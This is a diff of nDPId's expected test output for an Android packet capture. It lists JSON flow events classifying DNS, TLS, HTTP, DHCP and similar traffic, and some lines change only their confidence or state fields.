+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 